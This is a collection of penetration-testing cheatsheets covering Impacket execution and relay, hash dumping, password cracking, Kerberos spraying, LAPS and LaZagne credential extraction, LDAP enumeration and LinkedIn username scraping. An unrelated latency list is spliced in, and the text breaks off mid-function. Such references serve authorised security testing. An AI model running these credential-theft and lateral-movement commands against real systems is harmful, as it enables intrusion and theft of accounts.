Execute Command

impacket-psexec administrator:'Password123'@10.10.10.10 'whoami'

Domain Account

impacket-psexec DOMAIN/admin:'Password123'@10.10.10.10

Pass-the-Hash

impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10

impacket-smbexec

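Similar to psexec but doesn’t upload a service binary. It creates a service that runs each command through cmd.exe. Output is read back from a file on a target share (default C$, change it with -share) or, with -mode SERVER, through a local SMB server.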

Interactive Shell

impacket-smbexec administrator:'Password123'@10.10.10.10

With Share

impacket-smbexec -share ADMIN$ administrator:'Password123'@10.10.10.10

impacket-atexec

Execute commands via Task Scheduler service.

Execute Command

impacket-atexec administrator:'Password123'@10.10.10.10 'whoami'

Pass-the-Hash

impacket-atexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 admin@10.10.10.10 'ipconfig'

impacket-wmiexec

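Execute commands via WMI. Stealthier than psexec: no service binary is uploaded, no service is created and fewer logs are generated. Command output is still written to a temporary file on ADMIN$ and deleted afterwards. Runs as the authenticated user (not SYSTEM). Each command spawns a new cmd.exe via WMI, which generates Event ID 4688 when process-creation auditing is enabled.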

Interactive Shell

impacket-wmiexec administrator:'Password123'@10.10.10.10

Execute Command

impacket-wmiexec administrator:'Password123'@10.10.10.10 'whoami'

psexec vs wmiexec

| | psexec | wmiexec |

|---|---|---|

| Runs as | SYSTEM | Authenticated user |

| Service binary uploaded | Yes (ADMIN$) | No |

| Log volume | Higher | Lower |

| Stealth | Lower | Higher |

impacket-dcomexec

Execute commands via DCOM.

impacket-dcomexec administrator:'Password123'@10.10.10.10

impacket-ntlmrelayx

NTLM relay attack tool.

Basic Relay (Dump SAM)

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10

Relay with Command Execution

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10 -c 'powershell -e <BASE64>'

Relay to Multiple Targets

impacket-ntlmrelayx --no-http-server -smb2support -tf targets.txt

Options

| Option | Description |

|---|---|

| -t TARGET | Single target |

| -tf FILE | Targets file |

| -smb2support | Enable SMB2 support |

| --no-http-server | Disable HTTP server |

| -c CMD | Command to execute |

| -e FILE | Execute file |

| -w | Watch the targets file (-tf) for changes and reload it |

| --remove-mic | Remove MIC (CVE-2019-1040) |

impacket-secretsdump

Dump secrets from SAM, LSA, and NTDS.dit.

Local SAM Dump

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Remote Dump

impacket-secretsdump administrator:'Password123'@10.10.10.10

Dump NTDS (Domain Controller)

impacket-secretsdump -just-dc administrator:'Password123'@dc01.domain.local

Just NTLM Hashes

impacket-secretsdump -just-dc-ntlm administrator:'Password123'@dc01.domain.local

impacket-smbclient

SMB client similar to smbclient.

impacket-smbclient administrator:'Password123'@10.10.10.10

Commands: shares, use, ls, cd, get, put, cat

impacket-smbserver

Create a local SMB server.

Basic Server

impacket-smbserver share /path/to/share

With SMB2 Support

impacket-smbserver share /path/to/share -smb2support

With Authentication

impacket-smbserver share /path/to/share -username user -password pass

impacket-GetNPUsers

AS-REP Roasting - get TGT for users with “Do not require Kerberos preauthentication”.

impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10

impacket-GetUserSPNs

Kerberoasting - get service tickets for cracking.

impacket-GetUserSPNs DOMAIN/user:'Password123' -dc-ip 10.10.10.10 -request

Common Options

| Option | Description |

|---|---|

| -hashes LMHASH:NTHASH | Use NTLM hashes |

| -no-pass | Don’t ask for password |

| -k | Use Kerberos authentication |

| -dc-ip IP | Domain controller IP |

| -target-ip IP | Target IP (if hostname used) |

| -debug | Enable debug output |

John the Ripper Cheatsheet

Basic Syntax

john [options] <hash_file>

Cracking Modes

| Mode | Option | Description | Example |

|---|---|---|---|

| Single | --single | Rule-based cracking using username/GECOS data | john --single passwd |

| Wordlist | --wordlist=FILE | Dictionary attack with wordlist | john --wordlist=rockyou.txt hashes.txt |

| Incremental | --incremental | Brute-force guided by character-frequency tables (.chr files) | john --incremental hashes.txt |

Common Options

| Option | Description | Example |

|---|---|---|

| --format=FORMAT | Specify hash format | john --format=raw-md5 hashes.txt |

| --wordlist=FILE | Use wordlist for dictionary attack | john --wordlist=passwords.txt hashes.txt |

| --rules | Apply word mangling rules | john --wordlist=words.txt --rules hashes.txt |

| --show | Display cracked passwords | john --show hashes.txt |

| --pot=FILE | Specify pot file location | john --pot=custom.pot hashes.txt |

| --session=NAME | Name the session for restore | john --session=crack1 hashes.txt |

| --restore=NAME | Restore a previous session | john --restore=crack1 |

Common Hash Formats

| Format | Option | Description |

|---|---|---|

| MD5 | --format=raw-md5 | Raw MD5 hashes |

| SHA1 | --format=raw-sha1 | Raw SHA1 hashes |

| SHA256 | --format=raw-sha256 | Raw SHA256 hashes |

| SHA512 | --format=raw-sha512 | Raw SHA512 hashes |

| SHA512crypt | --format=sha512crypt | Linux $6$ hashes |

| MD5crypt | --format=md5crypt | Linux $1$ hashes |

| bcrypt | --format=bcrypt | Blowfish-based hashes |

| NT | --format=nt | Windows NT hashes |

| LM | --format=LM | LAN Manager hashes |

| NetNTLMv1 | --format=netntlm | NetNTLMv1 network (challenge-response) hashes |

| NetNTLMv2 | --format=netntlmv2 | NetNTLMv2 network (challenge-response) hashes |

| Kerberos 5 | --format=krb5 | Kerberos 5 hashes |

| MySQL | --format=mysql-sha1 | MySQL SHA1 hashes |

| MSSQL | --format=mssql | MS SQL hashes |

| Oracle | --format=oracle11 | Oracle 11 hashes |

2john Conversion Tools

| Tool | Description |

|---|---|

| zip2john | Convert ZIP archives |

| rar2john | Convert RAR archives |

| pdf2john | Convert PDF documents |

| ssh2john | Convert SSH private keys |

| keepass2john | Convert KeePass databases |

| office2john | Convert MS Office documents |

| putty2john | Convert PuTTY private keys |

| gpg2john | Convert GPG keys |

| wpa2john | Convert WPA/WPA2 handshakes |

| truecrypt_volume2john | Convert TrueCrypt volumes |

| bitlocker2john | Convert BitLocker volumes |

| 7z2john.pl | Convert 7-Zip archives |

Usage:

<tool> <file_to_crack> > file.hash

john file.hash

Useful Examples

Crack Linux Shadow File

unshadow /etc/passwd /etc/shadow > unshadowed.txt

john --single unshadowed.txt

Dictionary Attack with Rules

john --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt

Crack Specific Format

john --format=raw-md5 --wordlist=passwords.txt md5_hashes.txt

Show Cracked Passwords

john --show hashes.txt

Crack ZIP File

zip2john protected.zip > zip.hash

john --wordlist=rockyou.txt zip.hash

Crack SSH Private Key

ssh2john id_rsa > ssh.hash

john --wordlist=passwords.txt ssh.hash

Incremental Mode (Brute Force)

john --incremental hashes.txt

Resume a Session

john --restore=session_name

Hunting for Encrypted Files

Find common encrypted file types

for ext in ".xls" ".xls*" ".xltx" ".od*" ".doc" ".doc*" ".pdf" ".pot" ".pot*" ".pp*"; do

echo -e "\nFile extension: " "$ext"

find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core"

done

Find SSH private keys

grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null

Check if SSH key is encrypted

ssh-keygen -yf ~/.ssh/id_rsa

# If encrypted, prompts for passphrase

Cracking Protected Files

Crack Encrypted SSH Key

ssh2john.py SSH.private > ssh.hash

john --wordlist=rockyou.txt ssh.hash

john ssh.hash --show

Crack Office Document

office2john.py Protected.docx > protected-docx.hash

john --wordlist=rockyou.txt protected-docx.hash

john protected-docx.hash --show

Crack PDF File

pdf2john.py PDF.pdf > pdf.hash

john --wordlist=rockyou.txt pdf.hash

john pdf.hash --show

Cracking Protected Archives

Crack ZIP File

zip2john ZIP.zip > zip.hash

john --wordlist=rockyou.txt zip.hash

john zip.hash --show

Crack OpenSSL Encrypted GZIP

# Check file type

file GZIP.gzip

# Output: openssl enc'd data with salted password

# Brute-force with loop (errors expected, file extracts on success)

while IFS= read -r i; do

openssl enc -aes-256-cbc -d -in GZIP.gzip -k "$i" 2>/dev/null | tar xz

done < rockyou.txt

Crack BitLocker Drive

bitlocker2john -i Backup.vhd > backup.hashes

grep "bitlocker\$0" backup.hashes > backup.hash

john --wordlist=rockyou.txt backup.hash

Mounting BitLocker Drives (Linux)

# Install dislocker

sudo apt-get install dislocker

# Create mount points

sudo mkdir -p /media/bitlocker /media/bitlockermount

# Mount and decrypt

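sudo losetup -f -P --show Backup.vhd   # prints the loop device it used, e.g. /dev/loop0

sudo dislocker /dev/loop0p2 -u<password> -- /media/bitlocker   # use the partition of the device printed above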

sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount

# Unmount when done

sudo umount /media/bitlockermount

sudo umount /media/bitlocker

Kerbrute Cheatsheet

Fast Kerberos pre-authentication brute-forcer for username enumeration and password spraying.

- GitHub: https://github.com/ropnop/kerbrute

- Does not generate event ID 4625 (logon failure) during username enumeration

- Generates event ID 4768 (TGT request) if Kerberos logging is enabled

- Username enumeration does not cause account lockouts

- Password spraying does count toward lockout thresholds

Basic Syntax

kerbrute <command> [flags]

Commands

| Command | Description |

|---|---|

| userenum | Enumerate valid AD usernames via Kerberos |

| passwordspray | Spray a single password against a list of users |

| bruteuser | Brute-force a single user’s password |

| bruteforce | Brute-force using user:password combo list |

Global Flags

| Flag | Description |

|---|---|

| -d DOMAIN | Domain to authenticate against (required) |

| --dc IP | Domain Controller IP or hostname |

| -t THREADS | Number of threads (default: 10) |

| -o FILE | Output file for results |

| --safe | Safe mode: abort if any account is locked out |

| --downgrade | Downgrade to ARCFOUR-HMAC-MD5 encryption |

| -v | Verbose output |

Username Enumeration

Enumerate Valid Users from Wordlist

kerbrute userenum -d domain.local --dc 172.16.5.5 /path/to/userlist.txt

With Output File

kerbrute userenum -d domain.local --dc 172.16.5.5 -o valid_users.txt /path/to/userlist.txt

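How it works: Sends an AS-REQ without pre-authentication data. If the KDC responds with KDC_ERR_C_PRINCIPAL_UNKNOWN, the user doesn’t exist. If it responds with KDC_ERR_PREAUTH_REQUIRED, the user is valid. If it returns an AS-REP straight away, the user is valid and does not require pre-authentication (AS-REP roastable).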
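The same decision logic can be written as a minimal Python sketch. The numeric codes are the RFC 4120 values. The function name and the returned labels are hypothetical. This illustrates the protocol behavior only: it is not kerbrute's source and sends no packets. It assumes AD answers disabled, expired or locked-out accounts with KDC_ERR_CLIENT_REVOKED.

```python
# Kerberos error codes (RFC 4120) relevant to username enumeration.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6
KDC_ERR_CLIENT_REVOKED = 18
KDC_ERR_PREAUTH_REQUIRED = 25


def classify_userenum(error_code):
    """Interpret the KDC's reply to an AS-REQ sent without pre-authentication data.

    error_code is None when the KDC answered with an AS-REP instead of an error.
    """
    if error_code is None:
        return "valid (no pre-auth required: AS-REP roastable)"
    if error_code == KDC_ERR_PREAUTH_REQUIRED:
        return "valid"
    if error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "does not exist"
    if error_code == KDC_ERR_CLIENT_REVOKED:
        return "exists but disabled, expired, or locked out"
    return f"unknown (error {error_code})"
```

Pre-authentication is never attempted with a password during enumeration, so no bad-password attempt is recorded. This is why username enumeration does not cause lockouts.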

Password Spraying

Spray Single Password

kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'

Safe Mode (Stop on Lockout)

kerbrute passwordspray -d domain.local --dc 172.16.5.5 --safe valid_users.txt 'Welcome1'

Brute-Force Single User

kerbrute bruteuser -d domain.local --dc 172.16.5.5 /path/to/passwords.txt jsmith

Brute-Force with Combo List

File format: user:password (one per line)

kerbrute bruteforce -d domain.local --dc 172.16.5.5 combos.txt

Useful Username Wordlists

| List | Description |

|---|---|

| jsmith.txt | 48,705 flast format names |

| jsmith2.txt | Extended flast list |

| top-usernames-shortlist.txt | Common usernames |

Source: statistically-likely-usernames
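The flast convention (first initial plus last name) is easy to generate from a list of employee names. Below is a minimal Python sketch. It assumes ASCII names, treats the last word as the surname, and drops any non-letter characters. Names with accents or surname particles (for example "de la Cruz") may need manual review. `flast` is a hypothetical helper.

```python
import re


def flast(full_name):
    """'John Smith' -> 'jsmith': first initial + last name, lowercase, letters only."""
    parts = [re.sub(r"[^a-z]", "", p) for p in full_name.lower().split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        raise ValueError(f"need at least a first and last name: {full_name!r}")
    return parts[0][0] + parts[-1]
```

Writing one `flast(name)` per line produces a file you can pass to `kerbrute userenum`.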

Detection Notes

| Action | Event ID | Notes |

|---|---|---|

| Username enumeration | 4768 | Only if Kerberos logging enabled via Group Policy |

| Password spraying | 4768 + 4771 | Failed pre-auth counts toward lockout |

LAPSToolkit Cheatsheet

PowerShell tool for enumerating and abusing Microsoft LAPS (Local Administrator Password Solution) in Active Directory environments.

Loading LAPSToolkit

Import-Module .\LAPSToolkit.ps1

Find Delegated Groups

Parse ExtendedRights for all computers with LAPS enabled. Shows groups specifically delegated to read LAPS passwords:

Find-LAPSDelegatedGroups

Find Extended Rights

Check rights on each LAPS-enabled computer for groups with read access and users with “All Extended Rights.” Users with this right can read LAPS passwords and may be less protected than users in delegated groups:

Find-AdmPwdExtendedRights

Get LAPS Computers and Passwords

Search for LAPS-enabled computers, password expiration, and cleartext passwords (if your user has read access):

Get-LAPSComputers

Enumeration Flow

- Find-LAPSDelegatedGroups: identify which groups can read LAPS passwords per OU

- Find-AdmPwdExtendedRights: find users/groups with extended rights on LAPS-enabled computers

- Get-LAPSComputers: attempt to read actual passwords and expiration dates

Notes

- An account that has joined a computer to the domain receives All Extended Rights over that host, which includes the ability to read LAPS passwords

- Machines without LAPS installed are potential lateral movement targets (local admin password reuse)

- LAPS passwords are stored in the ms-Mcs-AdmPwd attribute on computer objects in AD

Latency Numbers Every SRE Should Know

- nanosecond = 1/1,000,000,000 second

- microsecond = 1/1,000,000 second

- millisecond = 1/1,000 second

Sub-Nanosecond Range

- Accessing CPU registers

- CPU Clock Cycle

1-10 Nanosecond Range

- L1/L2 cache

- Branch Misprediction in CPU pipelining

10-100 Nanosecond Range

- L3 cache

- Apple M1 referencing main memory (RAM)

100-1000 Nanosecond Range

- System call on Linux

- MD5 hash a 64-bit number

1-10 Microsecond Range

- Context switching between Linux threads

10-100 Microsecond Range

- Process an HTTP request

- Reading 1 megabyte of sequential data from RAM

- Read an 8 KB page from an SSD

100-1000 Microsecond Range

- SSD write latency

- Intra-zone networking round trip in most cloud providers

- Memcache/Redis get operation

1-10 Millisecond Range

- Inter-zone networking latency

- Seek time of an HDD

10-100 Millisecond Range

- Network round trip between US-west and US-east coast

- Read 1 gigabyte sequentially from main memory

100-1000 Millisecond Range

- Slow password-hashing algorithms (e.g. bcrypt)

- TLS handshake

- Read 1 gigabyte sequentially from an SSD

1 second+

- Transfer 1GB over a cloud network within the same region
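Back-of-the-envelope checks against these ranges are easy to script. Below is a minimal Python sketch that maps a duration to the matching bucket in the list above. It assumes, as an illustrative figure taken from the 10-100 µs range, that reading 1 MB sequentially from RAM takes about 50 µs. Scaling that to 1 GB (1024 MB) gives about 51 ms. `bucket` and the constants are hypothetical names.

```python
# Upper bound (exclusive, in seconds) of each bucket used in the list above.
BUCKETS = [
    (1e-9, "sub-nanosecond"),
    (10e-9, "1-10 ns"),
    (100e-9, "10-100 ns"),
    (1e-6, "100-1000 ns"),
    (10e-6, "1-10 µs"),
    (100e-6, "10-100 µs"),
    (1e-3, "100-1000 µs"),
    (10e-3, "1-10 ms"),
    (100e-3, "10-100 ms"),
    (1.0, "100-1000 ms"),
]


def bucket(seconds):
    """Return the latency range from the list above that a duration falls into."""
    for upper, label in BUCKETS:
        if seconds < upper:
            return label
    return "1 second+"


# Assumption: ~50 µs to read 1 MB sequentially from RAM.
ram_1mb = 50e-6
ram_1gb = 1024 * ram_1mb  # about 0.0512 s
```

`bucket(ram_1gb)` lands in "10-100 ms". The same scaling works for other entries, for example multiplying a per-page SSD read by the number of pages.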

LaZagne Cheatsheet

Installation

# Windows: Download from releases

https://github.com/AlessandroZ/LaZagne/releases

# Linux/macOS

pip3 install -r requirements.txt

python3 laZagne.py all

Basic Commands

| Command | Description |

|---|---|

| laZagne.exe all | Extract all credentials |

| laZagne.exe all -quiet | Quiet mode (nothing printed to the console) |

| laZagne.exe all -oJ | JSON output |

| laZagne.exe all -oN | Text file output |

Module Categories

| Category | Command |

|---|---|

| Browsers | laZagne.exe browsers |

| Windows Creds | laZagne.exe windows |

| Sysadmin Tools | laZagne.exe sysadmin |

| Email Clients | laZagne.exe mails |

| Databases | laZagne.exe databases |

| WiFi | laZagne.exe wifi |

| Git | laZagne.exe git |

Windows Credential Manager

Extract All Windows Credentials

laZagne.exe windows

Specific Windows Modules

| Module | Command |

|---|---|

| Credential Manager | laZagne.exe windows -m credman |

| Windows Vault | laZagne.exe windows -m vault |

| DPAPI Secrets | laZagne.exe windows -m dpapi |

| Auto-logon | laZagne.exe windows -m autologon |

| Cached Creds | laZagne.exe windows -m cachedump |

| SAM Hashes | laZagne.exe windows -m hashdump |

| LSA Secrets | laZagne.exe windows -m lsa_secrets |

With User Password (DPAPI)

laZagne.exe windows -password 'UserPassword123'

Browser Credentials

# All browsers

laZagne.exe browsers

# Specific browser

laZagne.exe browsers -m chrome

laZagne.exe browsers -m firefox

laZagne.exe browsers -m chromiumedge

Output Options

| Option | Description |

|---|---|

| -quiet | Quiet mode: nothing printed to the console (combine with -oN/-oJ/-oA) |

| -oN | Save as text file |

| -oJ | Save as JSON |

| -oA | Save all formats |

| -output <dir> | Specify output directory |

| -v | Verbose |

| -vv | Extra verbose |

Advanced Options

| Option | Description |

|---|---|

| -user <name> | Target specific user |

| -password <pass> | DPAPI decryption password |

| -local | Offline mode |

Offline Extraction

laZagne.exe all -local -sam SAM -security SECURITY -system SYSTEM

Quick One-Liners

Quiet JSON Dump

laZagne.exe all -quiet -oJ

Windows Creds Only

laZagne.exe windows -m credman -m vault -quiet

All Browsers

laZagne.exe browsers -quiet -oJ

Linux Commands

python3 laZagne.py all

python3 laZagne.py browsers

python3 laZagne.py sysadmin

python3 laZagne.py memory

Related Tools

| Tool | Use Case |

|---|---|

| Mimikatz | LSASS memory extraction |

| pypykatz | Offline LSASS analysis |

| SharpDPAPI | C# DPAPI attacks |

ldapsearch Cheatsheet

Command-line tool for querying LDAP directories. Part of the OpenLDAP suite.

Basic Syntax

ldapsearch [options] [filter] [attributes...]

Connection Options

| Option | Description | Example |

|---|---|---|

| -h HOST | LDAP server hostname (deprecated, use -H) | -h 172.16.5.5 |

| -H URI | LDAP URI | -H ldap://172.16.5.5 |

| -p PORT | Port (default: 389, LDAPS: 636) | -p 389 |

| -x | Simple authentication (instead of SASL) | |

| -D BINDDN | Bind DN (username) | -D "CN=admin,DC=domain,DC=local" |

| -w PASS | Bind password | -w Password123 |

| -W | Prompt for password | |

| -Z | Start TLS | |

| -ZZ | Require TLS (fail if unavailable) | |

Search Options

| Option | Description | Example |

|---|---|---|

| -b BASEDN | Search base DN | -b "DC=DOMAIN,DC=LOCAL" |

| -s SCOPE | Search scope: base, one, sub | -s sub |

| -f FILE | Read filters from file | |

| -l TIMELIMIT | Time limit (seconds) | -l 30 |

| -z SIZELIMIT | Size limit (entries) | -z 1000 |

| -LLL | Minimal output (no comments, version) | |

Common LDAP Filters

| Filter | Description |

|---|---|

| (objectclass=user) | All user objects |

| (objectclass=computer) | All computer objects |

| (objectclass=group) | All group objects |

| (&(objectclass=user)(sAMAccountName=jsmith)) | Specific user |

| (&(objectclass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local)) | Domain Admins |

| (&(objectclass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) | Enabled accounts only |

| (sAMAccountType=805306368) | Normal user accounts |
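The `userAccountControl:1.2.840.113556.1.4.803:=N` filters use AD's bitwise-AND matching rule: an entry matches when every bit of N is set. Below is a minimal Python sketch that decodes a few common userAccountControl bits (values as published by Microsoft) and reproduces that matching rule. The dictionary covers only a subset of flags, and the helper names are hypothetical.

```python
# A subset of userAccountControl bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}


def decode_uac(value):
    """List the names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def bit_and_match(value, mask):
    """What the LDAP_MATCHING_RULE_BIT_AND rule (OID 1.2.840.113556.1.4.803) tests."""
    return (value & mask) == mask
```

`decode_uac(514)` gives `["ACCOUNTDISABLE", "NORMAL_ACCOUNT"]`, a disabled user. The "Enabled accounts only" filter above keeps entries where `bit_and_match(uac, 2)` is false.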

Anonymous Bind Examples

Enumerate All Users

ldapsearch -h 172.16.5.5 -x -b "DC=DOMAIN,DC=LOCAL" -s sub "(&(objectclass=user))" sAMAccountName | grep sAMAccountName: | cut -f2 -d" "

Get Password Policy

ldapsearch -h 172.16.5.5 -x -b "DC=DOMAIN,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Get Domain Info

ldapsearch -h 172.16.5.5 -x -s base -b "" namingcontexts

Authenticated Examples

Bind and Search Users

ldapsearch -H ldap://172.16.5.5 -x -D "CN=admin,DC=domain,DC=local" -w Password123 -b "DC=DOMAIN,DC=LOCAL" "(&(objectclass=user))" sAMAccountName

Search with Minimal Output

ldapsearch -H ldap://172.16.5.5 -x -D "user@domain.local" -w Password123 -b "DC=DOMAIN,DC=LOCAL" -LLL "(objectclass=user)" cn sAMAccountName

Useful Attributes to Query

| Attribute | Description |
|---|---|
| sAMAccountName | Logon name |
| userPrincipalName | UPN (user@domain) |
| cn | Common name |
| distinguishedName | Full DN path |
| memberOf | Group memberships |
| userAccountControl | Account flags (enabled/disabled, etc.) |
| pwdLastSet | Last password change (FILETIME) |
| lastLogon | Last logon timestamp (FILETIME; tracked per DC, not replicated) |
| lockoutTime | Account lockout time (FILETIME; 0 = not locked out) |
| badPwdCount | Failed password attempts (tracked per DC, not replicated) |
| minPwdLength | Minimum password length (domain-level) |
| lockoutThreshold | Lockout threshold (domain-level) |
| pwdHistoryLength | Password history length (domain-level) |
| pwdProperties | Password complexity flags (domain-level) |
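pwdLastSet, lastLogon and lockoutTime come back as raw integers. They are Windows FILETIME values, which count 100-nanosecond intervals since 1601-01-01 UTC. Below is a minimal Python sketch for converting them to readable timestamps. It assumes that 0 and the largest signed 64-bit value should both be read as "never set"; that sentinel handling is an assumption of this sketch.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional

# FILETIME epoch: 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Assumption: treat 0 and the largest signed 64-bit value as "never set".
NEVER = {0, 0x7FFFFFFFFFFFFFFF}


def filetime_to_datetime(value: int) -> Optional[datetime]:
    """Convert an AD FILETIME (100-ns ticks since 1601) to an aware UTC datetime."""
    if value in NEVER:
        return None
    # One tick is 100 ns, so ten ticks make one microsecond.
    return FILETIME_EPOCH + timedelta(microseconds=value // 10)


if __name__ == "__main__":
    # 116444736000000000 ticks is exactly the Unix epoch.
    print(filetime_to_datetime(116444736000000000))  # 1970-01-01 00:00:00+00:00
    print(filetime_to_datetime(0))                   # None
```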

Password Policy Attributes

| Attribute | Description |
|---|---|
| minPwdLength | Minimum password length |
| maxPwdAge | Maximum password age (negative 100-nanosecond interval) |
| minPwdAge | Minimum password age (negative 100-nanosecond interval) |
| pwdHistoryLength | Password history length |
| pwdProperties | Bitmask of password settings; bit 0x1 set = complexity enabled, 0 = no complexity |
| lockoutThreshold | Bad password attempts before lockout (0 = accounts never lock out) |
| lockoutDuration | Lockout duration (negative 100-nanosecond interval) |
| lockOutObservationWindow | Time after which the bad-password counter resets (negative 100-nanosecond interval) |
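maxPwdAge, minPwdAge, lockoutDuration and lockOutObservationWindow are stored as negative counts of 100-nanosecond units. pwdProperties is a bitmask in which bit 0x1 means complexity is required. Below is a small Python sketch for making these raw policy values readable. The function names are illustrative, and the sample inputs are example values rather than defaults taken from any particular domain.

```python
from datetime import timedelta

DOMAIN_PASSWORD_COMPLEX = 0x1  # pwdProperties bit for complexity


def interval_to_timedelta(value: int) -> timedelta:
    """Convert a (negative) 100-ns interval such as lockoutDuration to a timedelta."""
    # AD stores these durations as negative numbers; only the magnitude matters here.
    return timedelta(microseconds=abs(value) // 10)


def complexity_enabled(pwd_properties: int) -> bool:
    """True if the complexity bit is set in pwdProperties."""
    return bool(pwd_properties & DOMAIN_PASSWORD_COMPLEX)


if __name__ == "__main__":
    print(interval_to_timedelta(-18000000000))     # 0:30:00
    print(interval_to_timedelta(-36288000000000))  # 42 days, 0:00:00
    print(complexity_enabled(1))                   # True
```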

Tips

- Use -LLL for clean, parseable output
- Pipe through grep, awk, or cut to extract specific fields
- Anonymous binds are a legacy configuration (disabled by default since Windows Server 2003)
- Use -H ldap:// instead of the deprecated -h flag in newer versions
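grep and cut can get fiddly with -LLL output. Long DNs are folded onto continuation lines that start with a space, and some values are printed base64-encoded after a double colon (attr:: ...). A small parser handles both cases. This is a sketch that assumes plain -LLL entry output (no change records, no attr:< URL values); it is not a full RFC 2849 implementation.

```python
import base64
from collections import defaultdict


def unfold(text: str) -> list[str]:
    """Join LDIF continuation lines (lines that start with a single space)."""
    lines: list[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Parse `ldapsearch -LLL` style output into a list of {attribute: [values]} dicts."""
    entries: list[dict[str, list[str]]] = []
    current: defaultdict[str, list[str]] = defaultdict(list)
    for line in unfold(text):
        if not line.strip():
            # A blank line ends the current entry.
            if current:
                entries.append(dict(current))
                current = defaultdict(list)
            continue
        if line.startswith("#"):
            continue  # comment (only present without -LL/-LLL)
        attr, sep, value = line.partition(":")
        if not sep:
            continue  # not an "attr: value" line
        if value.startswith(":"):
            # "attr:: <base64>" means the value was base64-encoded.
            value = base64.b64decode(value[1:].strip()).decode("utf-8", errors="replace")
        else:
            value = value.strip()
        current[attr].append(value)
    if current:
        entries.append(dict(current))
    return entries


if __name__ == "__main__":
    sample = (
        "dn: CN=John Smith,CN=Users,DC=domain,DC=lo\n"
        " cal\n"
        "sAMAccountName: jsmith\n"
        "\n"
        "dn: CN=Jane Doe,CN=Users,DC=domain,DC=local\n"
        "cn:: SmFuZSBEb2U=\n"
        "sAMAccountName: jdoe\n"
    )
    for entry in parse_ldif(sample):
        print(entry["dn"][0], entry["sAMAccountName"][0])
```

Multi-valued attributes such as memberOf end up as lists, so group memberships survive intact.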

linkedin2username Cheatsheet

OSINT tool that generates username lists from a company’s LinkedIn employee page.

Installation

git clone https://github.com/initstring/linkedin2username.git

cd linkedin2username

pip3 install -r requirements.txt

Basic Syntax

python3 linkedin2username.py -u <linkedin_email> -c <company_id> [options]

Options

| Option | Description | Example |
|---|---|---|
| -u EMAIL | LinkedIn login email (required) | -u user@email.com |
| -c COMPANY_ID | LinkedIn company ID (required) | -c 1234 |
| -p PASS | LinkedIn password (prompts if omitted) | -p Password123 |
| -n DEPTH | Page depth to scrape (default: 25) | -n 50 |
| -d DELAY | Delay between requests in seconds | -d 3 |
| -g | Get geolocation data for users | |
| -o OUTPUT | Output directory | -o ./results |
| --keyword KEYWORD | Filter by keyword/title | --keyword engineer |

Finding Company ID

- Go to the company’s LinkedIn page

- Click “See all employees”

- The URL will contain the company ID:

https://www.linkedin.com/search/results/people/?currentCompany=%5B"COMPANY_ID"%5D
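If the company ID has to be pulled out of a copied search URL, Python's standard library can decode the currentCompany parameter. This is a sketch that assumes the parameter decodes to a JSON-style list such as ["1234"], which is how the URL above decodes. The function name is illustrative.

```python
import json
from urllib.parse import parse_qs, urlparse


def company_ids_from_url(url: str) -> list[str]:
    """Return the IDs in a LinkedIn people-search URL's currentCompany parameter."""
    values = parse_qs(urlparse(url).query).get("currentCompany")
    if not values:
        return []
    # parse_qs percent-decodes %5B%221234%22%5D to the JSON-style text ["1234"].
    return [str(company_id) for company_id in json.loads(values[0])]


if __name__ == "__main__":
    url = "https://www.linkedin.com/search/results/people/?currentCompany=%5B%221234%22%5D"
    print(company_ids_from_url(url))  # ['1234']
```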

Usage Examples

Basic Scrape

python3 linkedin2username.py -u user@email.com -c 1234

Deep Scrape with Delay

python3 linkedin2username.py -u user@email.com -c 1234 -n 100 -d 5

Filter by Title

python3 linkedin2username.py -u user@email.com -c 1234 --keyword "IT"

Output Files

The tool generates multiple username format files automatically:

| File | Format | Example |
|---|---|---|
| first.last.txt | First.Last | john.smith |
| flast.txt | FLast | jsmith |
| firstl.txt | FirstL | johns |
| first_last.txt | First_Last | john_smith |
| rawnames.txt | Full names | John Smith |
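You may want to rebuild these lists from rawnames.txt, or merge in names from another source. The same formats are easy to generate. This is a hypothetical helper that mirrors the table above; it is not linkedin2username's own code. It assumes simple "First Last" names, keeps only ASCII letters, and drops middle names.

```python
import re


def username_variants(full_name: str) -> dict[str, str]:
    """Map each format from the table above to a username for one "First Last" name."""
    # Hypothetical normalization: lowercase ASCII letters only, middle names dropped.
    parts = re.findall(r"[a-z]+", full_name.lower())
    if len(parts) < 2:
        return {}
    first, last = parts[0], parts[-1]
    return {
        "first.last": f"{first}.{last}",
        "flast": f"{first[0]}{last}",
        "firstl": f"{first}{last[0]}",
        "first_last": f"{first}_{last}",
    }


def build_lists(names: list[str]) -> dict[str, list[str]]:
    """Collect one de-duplicated, order-preserving list per format."""
    lists: dict[str, list[str]] = {}
    for name in names:
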